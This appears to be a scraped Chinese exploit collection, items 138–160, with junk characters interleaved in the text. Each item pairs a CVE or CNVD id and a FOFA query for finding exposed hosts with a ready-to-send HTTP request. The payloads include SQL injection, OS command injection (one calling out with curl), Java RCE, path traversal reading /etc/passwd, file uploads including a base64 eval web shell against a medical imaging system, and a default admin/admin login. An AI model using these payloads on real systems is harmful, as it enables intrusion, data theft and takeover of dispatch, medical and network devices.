+ h% t* K2 t7 t3 O) b1 PCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj, R3 L( v" D9 f
Upgrade-Insecure-Requests: 1
5 h! ]% d3 c! c' y8 z1 X  x% Y1 `' T: P: V, \! z
" |7 N8 O/ V0 Z9 A4 e' `2 y$ i  e) L
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
3 l4 \# `1 l( t- y0 P$ RCVE-2024-2621( `5 G6 D! _" M* H0 q( C
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( |* W0 G1 J1 W2 K3 R
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.15 Q7 S3 z& x9 g$ |: `7 d
Host: x.x.x.x
/ C# K7 _1 X% ?& g6 r* H8 i4 ], o* HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 g' o- Q& U. [/ A1 w6 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. G( c' \) r4 k' @. k9 S' {. ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ A$ g$ b9 `! B3 P' p& B
Accept-Encoding: gzip, deflate, br+ s* B6 B9 O( J% a0 f
Connection: close; p( k0 A7 J( q8 U8 A
Upgrade-Insecure-Requests: 1: Q: s. M* X6 L; I

* Y% S' j. G2 y$ [5 T" @! F# h8 A% S8 l7 w
139. 福建科立讯通信指挥调度平台editemedia.php sql注入0 \7 t+ l' @) O$ M- T1 x
CVE-2024-2622
  G8 P2 [6 i& A# H1 FFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, E0 ^& w6 v; @3 J/ p. U( VGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.17 @' {4 V7 @+ m; w$ [
Host: x.x.x.x
+ x- G- x0 m" @2 v# }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# T. K' V' X2 |4 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 I! {' h4 s' _7 j3 b  C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ Y7 d# j( c4 }6 R" ~$ I
Accept-Encoding: gzip, deflate, br) s) c6 G- m, p
Connection: close# ^2 n; o* g, A/ h2 R$ U
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
6 g, K  j1 l  I" q. L" e( f! P/ u  DUpgrade-Insecure-Requests: 1
8 `1 }( Y7 H) A6 u' C% ^6 I) ?2 `. B" t

- h, H1 x8 E( \/ D; F140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
& G" c4 g' i& g" `CVE-2024-2566
- z5 ^6 ]8 a% U9 I/ t3 KFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; ]8 V* T, n! V3 y8 W
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1( W+ [2 c9 K' w
Host: x.x.x.x
( c; R# f# K9 v! O* g/ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 F  f! C. B" j0 L! j( @7 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, l) E! y. _5 f' ^; W2 w. U8 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. I6 y- f( f2 r) }9 d# o, S2 e) n% x# B
Accept-Encoding: gzip, deflate, br
  K. I# J% }$ dConnection: close
2 l1 |$ \  d7 P1 SCookie: authcode=h8g9
- F: l+ h+ l: Q9 JUpgrade-Insecure-Requests: 1, Z% z8 E0 n0 p

7 z# r0 w( C' Z! B* h7 Y/ F* F- s+ P
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入: O2 w$ L' G3 U, L0 Y4 G5 G
FOFA:body="指挥调度管理平台"
/ R  l1 J) C2 L& @% f& DPOST /app/ext/ajax_users.php HTTP/1.13 w8 q, N4 a3 v& m* O: x
Host: your-ip
% j9 v% e7 i( ?% g& X1 P, PUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
0 Q  [" g/ j) x" B- [# gContent-Type: application/x-www-form-urlencoded: v1 W$ H6 r5 T. q" N5 s4 F4 F
2 V9 |7 x; u8 N6 n/ p. j4 m  c1 Q
" Z/ G2 Z. z# `8 |5 L
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
8 I+ h- M" |# P
' F1 G9 Z* s5 a. S7 k; |3 I$ l4 c$ R! ~4 p8 Z- R/ J0 {
142. CMSV6车辆监控平台系统中存在弱密码4 F$ V& J, ~$ P! ]* M! r
CVE-2024-29666, a- ~& j/ T/ M. f
FOFA:body="/808gps/"
) v" x4 r+ K% _. a4 ^admin/admin
: f- J5 S  X/ x- B. g0 T. K: U1 {143. Netis WF2780 v2.1.40144 远程命令执行
3 v, E! L3 e5 x& Z5 i- ]CVE-2024-25850" O+ w+ X- g6 r1 I% c+ D, P( n
FOFA:title='AP setup' && header='netis'  \$ a: `7 P. {  _1 ~
PAYLOAD
0 P4 W1 _7 y' L
# L9 C1 B" [( ~+ V" l/ J9 W0 S1 p144. D-Link nas_sharing.cgi 命令注入
8 E2 t: v' T- V! m+ ]& ZFOFA:app="D_Link-DNS-ShareCenter"
% j: _8 O) p4 ^# |& Q/ m* gsystem参数用于传要执行的命令
. A4 [. k2 b3 @4 r( P1 yGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.15 m8 j6 U4 T: i8 Z: B( X$ p+ K% Y
Host: x.x.x.x
0 f5 y$ Y1 P& F; \" c) P) jUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
+ I/ i4 u' j. a* A. l! V) eConnection: close
* x  T2 ]4 Z2 H) LAccept: */*) t* V; X9 l% V" R. L9 r. W
Accept-Language: en5 c. y8 z4 F2 ]6 s" [( V3 b, ?- v
Accept-Encoding: gzip" v! u) A" v4 J1 x/ ]

, X" ~2 Z  o0 p" W) J' r7 f/ q' S/ n3 y# S2 Y, g0 I
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入7 ]' p2 C2 I, a9 l, o
CVE-2024-3400
7 l! Q3 q! t% S6 n+ [FOFA:icon_hash="-631559155"
% a) q0 h, x+ Z. Z+ J) ]' qGET /global-protect/login.esp HTTP/1.1! X) O- F" }4 }3 ^' k9 H
Host: 192.168.30.112:10053 ~' H  j0 X, I7 N3 F9 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: X4 |# j8 B; p9 B
Connection: close3 Y+ }2 t& b% e' s) L* m% r, v
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
6 u/ z7 |" \1 G. u% ^# BAccept-Encoding: gzip& a9 Z  B7 e6 A
- x* t8 W8 c/ x+ I! p* |/ D% w
( w- E" r8 O+ _( d/ |: a+ z; g2 M
146. MajorDoMo thumb.php 未授权远程代码执行
* o" K  ]1 u+ Y3 vCNVD-2024-02175* u5 e1 n  Q. M2 r6 e
FOFA:app="MajordomoSL"
8 K5 `: _( q; |: U; q1 RGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.17 @. L# d: ?: z$ ~4 H
Host: x.x.x.x
) o7 P% V4 H0 g9 J  C1 V) CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
7 ~, F( `( @, N( tAccept-Charset: utf-8
- K- L( T$ M' t, ~/ Q5 z: |' m+ u+ nAccept-Encoding: gzip, deflate1 h4 S- u; F9 i$ E* U& H2 N
Connection: close/ \8 c8 e2 y" L: q

+ y! L/ E2 Z& z0 A, W6 y2 @5 X$ I: N# Y, i
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历- r; V/ E. W$ m" A- |" B# Q/ N
CVE-2024-32399
4 ?2 u9 G% `0 g+ d/ XFOFA:body="RaidenMAILD"' ]! X3 X( y" \8 S
GET /webeditor/../../../windows/win.ini HTTP/1.1
+ ], I" |! ~; Y# @. ^, eHost: 127.0.0.1:81
" R! D* p) |# G+ |$ p  s* z7 \1 aCache-Control: max-age=0
7 i0 S) T. |" L' W) p5 c4 hConnection: close
6 _5 G. T. i; x7 c% o; P5 Z
/ }/ Y, D2 r* r8 q* y" `
8 |0 _, L4 [1 i1 b: r148. CrushFTP 认证绕过模板注入! T/ ]/ p0 W( X, Z0 Z, H
CVE-2024-4040, u) b7 @( S7 D- m
FOFA:body="CrushFTP"
* D3 K" [5 \: g* k/ TPAYLOAD
( _% u4 f$ W: a/ k- Y
; f) g. o  C: _1 l) \7 @. P5 Q! c; e149. AJ-Report开源数据大屏存在远程命令执行% m* @8 G* m& P. f. k- K
FOFA:title="AJ-Report"
, N& W3 y. B& @" n& K  u, A5 K* U
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
$ p( E- j) B# X8 YHost: x.x.x.x
: c* F1 j4 w" d8 `- ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# L9 {# }( C* s" uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 ~8 U  v5 g, ?" |" [" L( O% CAccept-Encoding: gzip, deflate, br' G: k/ }# Z4 H( [
Accept-Language: zh-CN,zh;q=0.9
; }: B( d; ~. I/ x/ B: f- w- XContent-Type: application/json;charset=UTF-83 ?4 t, o: G% w
Connection: close
1 [+ |, R7 p& D5 u- h3 i1 y+ w! b* d; [. `% z0 t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
0 B6 S' k1 @& |; g' @- n$ l6 {' q& k; p5 p5 [/ P6 ?) X3 q
150. AJ-Report 1.4.0 认证绕过与远程代码执行
1 R3 F; J2 U0 a0 TFOFA:title="AJ-Report"1 g7 K' m7 j2 ]1 ?. F: r7 w
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
; L" x; E: x# d5 h# P- K/ DHost: x.x.x.x
$ G5 o& _! Y, o3 C1 w7 `; XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 N. q. K0 H3 Q6 t1 N) RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 {5 @( M0 N/ p  EAccept-Encoding: gzip, deflate, br3 u8 z( N8 }9 G7 y/ @1 B5 \
Accept-Language: zh-CN,zh;q=0.9
1 `  E6 n( z8 gContent-Type: application/json;charset=UTF-85 D+ a/ v- @$ _$ _6 \
Connection: close( N  d  q+ V3 D, `7 q0 }
Content-Length: 339
2 c, B$ D5 a) ^
6 x- O: {1 j4 r2 {( E- [+ z{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}* c# I( A8 j) i

9 m- O9 `& ?4 F4 W3 L+ w$ r
; m5 j' w" U% }/ J( n151. AJ-Report 1.4.1 pageList sql注入8 f; B6 ^+ g8 m2 R( S
FOFA:title="AJ-Report"; ~( m2 @5 W) N. {
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
5 W# H/ Y# o; z0 N/ N% y" pHost: x.x.x.x
8 X  _9 M( j/ |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 _7 F; a7 v9 d
Connection: close
: J5 p6 M, n2 d% v8 p* q! g/ oAccept-Encoding: gzip
' n2 U) J. T. K5 ]1 k& W
: n# |  a% P+ o9 _' a# x: ~8 L* E) T  C4 _2 W9 _
152. Progress Kemp LoadMaster 远程命令执行
5 z" f/ W( N3 jCVE-2024-1212
- c6 [. M  L! yLoadMaster <= 7.2.59.2 (GA)" ~* I! {6 U6 [* n# |* r/ F
LoadMaster<=7.2.54.8 (LTSF)
' A4 U- r, ~0 P" `LoadMaster <= 7.2.48.10 (LTS)
1 X7 {- d4 d" u& Q* TFOFA:body="LoadMaster"
3 z% B3 y. `3 \! m2 G" Y) {8 f+ T  YJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码5 Z& @! Y: [# b; p
GET /access/set?param=enableapi&value=1 HTTP/1.1
) _$ y  r) z2 ]Host: x.x.x.x
# u+ K8 Q  w# I9 Z+ v  pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
  p; q. N$ W3 g$ ?/ \Connection: close
& U* l7 @  `5 @& e9 Q3 nAccept: */*6 e8 C; K1 h# {  g1 w( [
Accept-Language: en( e0 o* k" {8 [6 I. g8 d& X  c
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
, m. n; T0 Y1 r1 IAccept-Encoding: gzip
: R; h( E- }- V3 o5 U4 O% F: y2 q/ c. A( F

! g6 h1 d4 U, K- l/ j- l6 b6 I' z153. gradio任意文件读取* v; s, @$ H7 q! p5 h
CVE-2024-1561FOFA:body="__gradio_mode__"
, B- j/ u4 s' R* F" Q# s, K4 E第一步,请求/config文件获取componets的id* x0 J* Z4 W! y3 i& n
http://x.x.x.x/config
5 y6 {2 l" B3 R) v0 p9 p
# d( ]' ~" z; T4 s# H& e1 B7 M4 s8 W$ }* ?2 Y. E9 r, R& t
第二步,将/etc/passwd的内容写入到一个临时文件* ^$ z; Y' G! {2 }; G; U
POST /component_server HTTP/1.1
6 z9 d9 V% f. d3 i! mHost: x.x.x.x
% `+ y5 \1 q1 k  ]0 h% l, `) {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' C! f% J3 T+ ?: V' r  x/ YConnection: close
* \8 W9 c5 }- s5 C4 F) @Content-Length: 1151 Y+ ~2 @, V. k9 E6 P
Content-Type: application/json1 F3 F. {: Y; A  z. I0 v- I
Accept-Encoding: gzip0 l# v( c' ~; D- }) ]; s( q
$ A( g  o& w4 I" u& I% M) @" [$ }
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
  |) g$ \3 O+ z8 O5 g- b; E- o9 v' A, B) z& J6 P
1 n; l/ b. k; a! O' ~
第三步访问
  I, S8 C8 ~+ H( Khttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
) T5 o7 k- V3 |/ S8 n. M+ `$ V8 j% U! {9 N2 w2 }

# h) k& ^5 g0 e+ |7 t154. 天维尔消防救援作战调度平台 SQL注入+ u8 Y# F) Q& j
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
+ a8 S$ ^" G+ [' K5 MPOST /twms-service-mfs/mfsNotice/page HTTP/1.1  J1 y$ \0 i7 N* d; Y- U7 Y
Host: x.x.x.x! b9 z$ ?3 J2 O' M; f/ F; i
Content-Length: 106$ W2 Y" B& m7 ~' Y" L* Y
Cache-Control: max-age=0) f- M: f3 |; ?7 r  r8 T
Upgrade-Insecure-Requests: 1/ b2 y' X6 p6 W8 t3 T
Origin: http://x.x.x.x
- M# l/ c" a4 RContent-Type: application/json) `- J2 N* o; ~& z" E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
1 x" a" k2 F7 u( GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( t" B6 O2 |! r$ @: S8 M, xReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
0 `% Y" w8 z; O. @" q+ }Accept-Encoding: gzip, deflate8 [9 M# N  [4 B1 }& n: Y
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
* {- F: @" p5 f% QConnection: close
  \# _7 W& g& o/ m; I
0 }7 `1 H* g  j; r& f8 i" E{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
2 A2 i. x+ b3 @6 @1 }+ N
1 v/ Z6 S& C6 ^0 k* [( E- U+ C! t2 {
155. 六零导航页 file.php 任意文件上传
9 m% f6 E$ k3 O( aCVE-2024-34982% |( B; Z" C4 m
FOFA:title=="上网导航 - LyLme Spage"
  m( [) W0 f1 D" [% T3 l- A9 t* }5 HPOST /include/file.php HTTP/1.16 r: S& N" t2 O! B3 g
Host: x.x.x.x. Q8 G' S9 i5 p" a3 `1 e" ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 i+ Y5 ?* \' R8 s; k5 C
Connection: close) \3 h+ P. x. k1 J, W  `2 B
Content-Length: 2329 y1 O6 F# F1 b' u. x
Accept: application/json, text/javascript, */*; q=0.01
  G5 A3 {+ u% y( a/ x9 [Accept-Encoding: gzip, deflate, br( T$ O6 |: B9 l% u* y5 e$ r- b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 e& J: ]. A1 V# p0 `6 ~4 X+ HContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
3 L: V9 q7 n# o6 d( ~- lX-Requested-With: XMLHttpRequest
) a% L+ d/ J. `# V' b" Z$ B; Q* v( |) ^+ D6 \0 H
-----------------------------qttl7vemrsold314zg0f$ ~9 l2 W( Z; m- N
Content-Disposition: form-data; name="file"; filename="test.php"
: K2 o2 S9 u9 k. Z8 vContent-Type: image/png9 p/ s4 O: Q  f3 S' A  M- _' M, {

8 @& s& U. l$ A! b3 F+ m<?php phpinfo();unlink(__FILE__);?>
. A$ E% o  R) |& t  G0 R-----------------------------qttl7vemrsold314zg0f--* I; H9 k0 ^& C* @3 s

" F' G  X# f  E' |* v8 T2 H0 S( R1 _$ t2 p& u- l7 l
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php" F% U' J8 E, z- ?3 D) R

' a3 ]# i4 [# s( w8 F. T7 P4 ]8 r156. TBK DVR-4104/DVR-4216 操作系统命令注入
9 i8 @2 K8 n) N4 l" k# F! ?CVE-2024-3721
3 w) T; W6 }, ZFOFA:"Location: /login.rsp"" N; _- n, a6 o6 `- e
·TBK DVR-4104$ O1 {$ ]" g1 G, k8 O0 n0 }0 E. g
·TBK DVR-4216
  s% O+ ~  j7 \! hcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"- V0 Y8 R- C& E0 |

( W. i7 I- k. q+ ]( i6 c- v7 v- m8 N' L/ Q0 f
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
+ c5 E8 H( S, n0 qHost: x.x.x.x
& }# u& a" t9 j- o, F6 k$ b, xUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 g1 D: n6 v( d1 v  `* VConnection: close+ \2 \5 C2 @" k2 t3 j7 E
Content-Length: 07 q' e# p: p$ m8 k8 ?2 ~
Cookie: uid=1% X+ o$ N3 V4 Y0 k1 q
Accept-Encoding: gzip
' n- `+ y. x8 y1 q+ `' z
( s1 q: G; i, j5 v* i
( H5 u: \) o( G0 X; R1 p  }/ L157. 美特CRM upload.jsp 任意文件上传
6 [. d5 |5 |5 ?2 Q0 ^4 f" XCNVD-2023-06971  R4 Y$ p# d  Y# |% h
FOFA:body="/common/scripts/basic.js"1 c) `& w) S! ]( {3 u% M
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
' \1 z7 P1 b8 w. D, lHost: x.x.x.x/ b  n8 z# P$ z1 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
7 W& ~' @( k& h8 i. Y( [3 n/ XContent-Length: 709, |6 K9 j( n7 x# X: ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. V. k4 R' b" lAccept-Encoding: gzip, deflate9 i" e+ E' ^: y( |+ ]7 L# D, \; C
Accept-Language: zh-CN,zh;q=0.9" J& P3 a0 z: a. v" [
Cache-Control: max-age=0
/ z6 q$ ]9 K' L$ x' Q* d& X* NConnection: close
; B8 _: w0 k$ U  PContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
# R2 m) |8 k5 _% g7 G( NUpgrade-Insecure-Requests: 1) ~3 i& J: D  ]- x
6 ?1 ^0 t3 _- {; {' [" e
------WebKitFormBoundary1imovELzPsfzp5dN
4 P% S; \( O" [. k. tContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
$ h! L; d1 Z. a, |  WContent-Type: application/octet-stream
3 u7 V7 s9 i& ]0 _2 p* e* u. k3 P
nyhelxrutzwhrsvsrafb# E+ ^! c$ Q) ^0 T3 Y, ?
------WebKitFormBoundary1imovELzPsfzp5dN
. G" P; S5 {8 A7 t: }% YContent-Disposition: form-data; name="key"
& U7 |. s4 }1 ]9 |% G# j$ c
8 q- Y2 ?: K1 V' z2 |+ c1 Wnull! a- p+ @* g- B+ `7 T+ x! C
------WebKitFormBoundary1imovELzPsfzp5dN0 N5 O) E( x& I8 U
Content-Disposition: form-data; name="form": l! q7 i7 r3 T
8 R7 p+ c* f; |' k1 G3 C+ e
null
+ K* R: n9 `  X% H* \+ w: i& h------WebKitFormBoundary1imovELzPsfzp5dN
* g/ L0 `  }2 T6 C1 [) |Content-Disposition: form-data; name="field"
2 J6 L1 ^$ X! x& H1 g) U# z5 o
* r9 z  j4 T3 h* P5 {& J# A: onull
0 ~+ R4 g* g8 O3 [------WebKitFormBoundary1imovELzPsfzp5dN
. h4 M" W' s" Y* h9 ?Content-Disposition: form-data; name="filetitile"
' l4 r* ^% l2 e4 p$ w* I2 y5 B, {* O. @  R; n
null' R4 T7 Y: e* a. `
------WebKitFormBoundary1imovELzPsfzp5dN
5 S3 W' w3 q7 I; W; \+ h' FContent-Disposition: form-data; name="filefolder"% h9 Q' Z. H. p) N6 U- w5 U& W

) n  J+ ~9 M. Z' @null; @: e' w; w3 s! k* D1 K+ q
------WebKitFormBoundary1imovELzPsfzp5dN--% |; P* E" `4 E8 R# S8 H  ]

, @$ ?3 v2 M% f# x$ y8 _- f( V& Z  t7 V
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
# y8 a" z# W$ r3 S
. L( U$ {+ B9 w- W# z" b158. Mura-CMS-processAsyncObject存在SQL注入$ T9 h: ^+ r) G
CVE-2024-32640, R" ]+ @8 c* n3 a+ u0 Y; C/ X
FOFA:"Generator: Masa CMS"$ ]; X% U+ ]' x  |9 G' k4 z+ v
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1" k1 r  ?% D) Z% f: T2 S
Host: {{Hostname}}
3 T+ D& [: \) Y* X$ E7 c3 l( y5 KContent-Type: application/x-www-form-urlencoded& k8 R7 X5 K2 x
( c) @0 _0 {; e; {5 m2 E4 K
object=displayregion&contenthistid=x\'&previewid=1
9 f% L3 p8 |8 A6 m0 P. e5 V4 |) g# A! Q  u: n' Q
% N9 C  c8 h$ Q/ H
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传" [$ b9 ~. m* d8 _9 I
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
' b: f) L5 z, W( U% }% Y" zPOST /webservices/WebJobUpload.asmx HTTP/1.1. ]" x: Z+ r. ~5 `! V
Host: x.x.x.x9 S" Y" y! O  A2 p. v5 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.360 t- D$ b! X% o+ t
Content-Length: 1080) P; x* h* `5 B* }
Accept-Encoding: gzip, deflate
1 o. o4 u9 t# l+ c+ z9 }Connection: close0 h  T7 F2 M7 {/ k
Content-Type: text/xml; charset=utf-83 L5 g* y6 V9 I9 Y) i
Soapaction: "http://rainier/jobUpload"6 N3 ]  D# Q" B6 O, |$ w( g5 I
4 J! U3 u6 O. A6 S* Y/ E% {2 }/ ^
<?xml version="1.0" encoding="utf-8"?>
6 b& d; _% G1 R1 z<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 {" E/ N3 L9 @0 d6 K
<soap:Body>
! O! Y& V, v( n- C. a5 W  K<jobUpload xmlns="http://rainier">
% v& B4 J; n, L1 p<vcode>1</vcode>
5 J. s) v1 F1 e9 U9 [6 Z<subFolder></subFolder>
( N  Y9 M! j+ v" ]8 ]5 O. \<fileName>abcrce.asmx</fileName>
( q$ F0 U, L& [; E<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
% w$ {# a8 Q+ e' q# Z9 n7 q  U0 m</jobUpload>4 r4 D' W% P/ R) p) ^
</soap:Body>' }8 ?) X( l7 e! S" V5 Q6 n* x) j( B0 S
</soap:Envelope>" f% ]* K% q$ |) w. B* Q

" P# U6 p3 ^' {- \6 y/ J& {) {- Y% l- ^% k
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")5 p" M) o' a5 J+ e5 b% w

. Z% \% f/ x  I) ~, b. y# ?/ r, i# V9 j9 Z* j) Y. `) A" d
160. Sonatype Nexus Repository 3目录遍历与文件读取
$ R4 E  \  s/ U: J; M4 G5 ~CVE-2024-4956" }0 M2 `7 K- V. S0 N8 @
FOFA:title="Nexus Repository Manager"
; A$ k! P& g( {' a! c( A9 ~GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
$ b7 ]) y' P% p7 A4 BHost: x.x.x.x  Y: t5 z* c' g) ^' z
